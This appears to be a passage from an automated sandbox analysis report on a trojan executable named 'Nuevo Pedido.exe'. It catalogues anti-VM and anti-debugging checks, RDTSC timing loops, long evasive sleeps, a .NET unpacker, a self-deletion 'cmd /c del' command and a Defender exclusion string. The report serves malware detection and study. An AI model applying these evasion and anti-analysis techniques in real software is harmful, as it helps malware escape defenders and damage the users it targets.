Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@11/6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: Nuevo Pedido.exe String found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
Source: Nuevo Pedido.exe String found in binary or memory: views/addbook.baml
Source: Nuevo Pedido.exe String found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
Source: Nuevo Pedido.exe String found in binary or memory: views/addcustomer.baml
Source: Nuevo Pedido.exe String found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
Source: Nuevo Pedido.exe String found in binary or memory: views/addbook.baml
Source: Nuevo Pedido.exe String found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
Source: Nuevo Pedido.exe String found in binary or memory: views/addcustomer.baml
Source: Nuevo Pedido.exe String found in binary or memory: a/MethodImplAttribut;component/views/addbook.xamlw/MethodImplAttribut;component/views/borrowfrombookview.xamlm/MethodImplAttribut;component/views/borrowingview.xamlg/MethodImplAttribut;component/views/changebook.xamlo/MethodImplAttribut;component/views/changecustomer.xamlk/MethodImplAttribut;component/views/customerview.xamlo/MethodImplAttribut;component/views/deletecustomer.xamle/MethodImplAttribut;component/views/errorview.xamli/MethodImplAttribut;component/views/smallextras.xamli/MethodImplAttribut;component/views/addcustomer.xaml
Source: Nuevo Pedido.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Nuevo Pedido.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Nuevo Pedido.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: Nuevo Pedido.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A892F5 push ds; ret 0_2_00A89340
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A89361 push ds; retf 0_2_00A89364
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A89347 push ds; ret 0_2_00A8934C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_056356E0 push esp; iretd 0_2_056356E9
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B822 push eax; ret 3_2_0041B828
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B82B push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B88C push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004153E6 push ss; iretd 3_2_004153EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041541E push ss; iretd 3_2_004153EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE92F5 push ds; ret 3_2_00DE9340
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE9347 push ds; ret 3_2_00DE934C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE9361 push ds; retf 3_2_00DE9364
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A0D0D1 push ecx; ret 3_2_01A0D0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047CD0D1 push ecx; ret 16_2_047CD0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B822 push eax; ret 16_2_0061B828
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B82B push eax; ret 16_2_0061B892
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B88C push eax; ret 16_2_0061B892
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006153E6 push ss; iretd 16_2_006153EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061541E push ss; iretd 16_2_006153EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B7D5 push eax; ret 16_2_0061B828
Source: initial sample Static PE information: section name: .text entropy: 7.85660170333

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Nuevo Pedido.exe.2e6b054.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nuevo Pedido.exe PID: 6320, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Nuevo Pedido.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Nuevo Pedido.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404 Thread sleep count: 834 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404 Thread sleep count: 1723 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6324 Thread sleep time: -32847s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239717s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239499s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239139s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238904s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238561s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238452s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -237796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -237437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -237250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -236890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -236781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6388 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 4140 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239843 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239717 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239609 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239499 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239390 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239250 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239139 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239015 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238904 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238781 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238671 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238561 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238452 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238343 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238046 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237796 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237437 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237250 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236890 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236781 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Window / User API: threadDelayed 834 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Window / User API: threadDelayed 1723 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239843 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 32847 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239717 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239609 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239499 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239390 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239250 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239139 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239015 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238904 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238781 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238671 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238561 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238452 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238343 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238046 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237796 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237437 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237250 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236890 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236781 Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.290974701.0000000008BB0000.00000004.00000001.sdmp Binary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000005.00000000.279912891.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000005.00000000.246577528.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Enables debug privileges
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A369A6 mov eax, dword ptr fs:[00000030h] 3_2_01A369A6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2990 mov eax, dword ptr fs:[00000030h] 3_2_019E2990
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA185 mov eax, dword ptr fs:[00000030h] 3_2_019EA185
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h] 3_2_01A351BE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h] 3_2_01A351BE
